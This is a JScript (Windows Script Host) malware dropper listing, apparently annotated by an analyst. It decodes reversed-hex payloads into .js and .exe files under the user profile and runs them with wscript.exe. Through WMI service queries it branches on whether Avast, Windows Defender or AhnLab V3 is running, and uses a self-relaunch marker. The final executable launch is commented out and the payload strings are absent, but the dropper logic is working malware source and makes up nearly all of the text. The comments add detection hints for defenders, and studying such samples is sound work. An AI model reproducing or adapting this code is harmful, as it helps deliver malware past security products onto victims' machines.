// Analyst notes: WSH (JScript) dropper stage. COM handles created here and used
// below: Scripting.FileSystemObject for the FileExists checks, WScript.Shell for
// environment expansion (and, separately, process spawning in runShellCommand),
// and Shell.Application, which in this listing is only referenced from the
// commented-out ShellExecute at the end of the file.
var bewktojmagvc = new ActiveXObject('Scripting.FileSystemObject');
var zevdbpspf = WScript.CreateObject("WScript.Shell");
// Drop directory: %USERPROFILE%\ — every file written below lands here.
var malScriptPath = zevdbpspf.ExpandEnvironmentStrings("%USERPROFILE%") + "\\";
var stwnydqsuji = WScript.CreateObject("shell.application");
// Decodes a hex-encoded payload string and writes the resulting bytes to disk.
// ecryptedPayload: hex string stored reversed (the reverse() below undoes that).
// outputFileName: full path of the file to create; SaveToFile mode 2 overwrites.
// `decyptedPayload` and `i` are assigned without `var`, so they leak into the
// global scope of the script.
function decryptAndDrop(ecryptedPayload, outputFileName) {
// decrypt and drop the payload
var ecryptedPayloadClean = ecryptedPayload.split("").reverse().join("");
decyptedPayload = '';
// Each pair of hex digits becomes one char code in 0x00-0xFF.
for (i = 0; i < (ecryptedPayloadClean.length / 2); i++) {
decyptedPayload += String.fromCharCode('0x' + ecryptedPayloadClean.substr(i * 2, 2));
}
// ADODB.Stream in text mode (Type 2) with ISO-8859-1: Latin-1 maps char codes
// 0x00-0xFF one-to-one onto bytes, so arbitrary binary content (e.g. the .exe
// dropped later) survives a WriteText call.
var payloadFile = new ActiveXObject("ADODB.Stream");
payloadFile.Type = 2;
payloadFile.Charset = "ISO-8859-1";
payloadFile.Open();
payloadFile.WriteText(decyptedPayload);
payloadFile.SaveToFile(outputFileName, 2);
payloadFile.Close();
}
// Spawns `shellCommand` via WScript.Shell.Exec and blocks until the child exits,
// polling every 100 ms. Status 0 means the process is still running; after 1800
// polls (about 180 s) the child is killed with Terminate() and the call returns.
// Every caller wraps this in try/catch, presumably for the case where Exec()
// itself throws (e.g. the command cannot be started).
function runShellCommand(shellCommand) {
var osShell = WScript.CreateObject("WScript.Shell");
var cmdResponse = osShell.Exec(shellCommand);
var i = 0;
while (true) {
if (cmdResponse.Status == 0) {
WScript.Sleep(100);
i++;
} else {
break;
}
// Timeout guard: 1800 * 100 ms = 3 minutes.
if (i == 1800) {
cmdResponse.Terminate();
break;
}
}
}
// Returns true only if the Windows service named `serviceName` reports State
// 'Running'; false otherwise, including when no such service exists.
// Implemented as a WMI query against Win32_Service. serviceName is concatenated
// straight into the WQL text; every caller in this listing passes a literal.
// `vaatgfp` and `xcabb` are implicit globals (no `var`).
function getServiceStatus(serviceName) {
// gets all the service passed in the parameter
var serviceObj = GetObject("winmgmts:").ExecQuery("SELECT * FROM Win32_Service WHERE Name='" + serviceName + "'");
vaatgfp = new Enumerator(serviceObj);
xcabb = vaatgfp.item();
var bfdln = '';
// When the query matches nothing, item() should yield undefined and reading
// .State throws; the empty catch turns that into the "not running" result.
try {
bfdln = xcabb.State;
} catch (e) {}
if (bfdln == 'Running') {
return true;
} else {
return false;
}
}
// Main flow: branch on which security product's service is running and, per
// product, decode a secondary script into %USERPROFILE% and run it with
// wscript.exe. The payload variables pjqssmaj, wvspotnpwm, hoszxms, mvqwaqu and
// xtaqukamdxzx are not defined anywhere in this listing — presumably supplied
// earlier in the original file.
// Detection value for defenders: wscript.exe writing .js/.exe files under the
// user profile, wscript.exe spawning a second wscript.exe, and Win32_Service
// WMI queries issued from a script host.
if (getServiceStatus('avast! Antivirus')) {
decryptAndDrop(pjqssmaj, malScriptPath + 'kyoxks.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'kyoxks.js"');
} catch (e) {}
// Lower-case `sleep` here vs `Sleep` in runShellCommand; WSH resolves COM
// member names case-insensitively, so both presumably work — worth remembering
// when emulating this in a non-WSH JavaScript engine.
WScript.sleep(15000);
}
// WdNisSvc / WinDefend: Windows Defender network inspection and core services.
if ((getServiceStatus('WdNisSvc')) || (getServiceStatus('WinDefend'))) {
decryptAndDrop(wvspotnpwm, malScriptPath + 'nykvwcajm.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'nykvwcajm.js"');
} catch (e) {}
}
if (getServiceStatus('NisSrv')) {
decryptAndDrop(hoszxms, malScriptPath + 'bervcptyvulur.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'bervcptyvulur.js"');
} catch (e) {}
}
// 'V3 Service' (AhnLab V3) path uses a two-run marker file: on the first run the
// marker is absent, so the script writes tgydmilslvp.txt (the hex '727272'
// reversed decodes to three 0x27 bytes; only the file's existence matters),
// relaunches itself with wscript.exe and exits. The relaunched instance then
// finds the marker and takes the first branch.
if (getServiceStatus('V3 Service')) {
if (bewktojmagvc.FileExists(malScriptPath + "tgydmilslvp.txt")) {
decryptAndDrop(mvqwaqu, malScriptPath + 'recjyzcz.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'recjyzcz.js"');
} catch (e) {}
} else {
decryptAndDrop('727272', malScriptPath + 'tgydmilslvp.txt');
try {
runShellCommand('wscript.exe "' + WScript.ScriptFullName + '"');
} catch (e) {}
WScript.Quit();
}
}
// Final stage: decode the main executable to %USERPROFILE%\dsoyaltj.exe. The
// ShellExecute that would launch it is commented out in this listing, so as
// written the file is dropped but never executed (the sample appears to have
// been deliberately defanged for analysis).
decryptAndDrop(xtaqukamdxzx, malScriptPath + 'dsoyaltj.exe');
if (bewktojmagvc.FileExists(malScriptPath + "dsoyaltj.exe")) {
try {
// stwnydqsuji.ShellExecute('"' + malScriptPath + "dsoyaltj.exe" + '"', '', "", "open", 1);
} catch (e) {}
}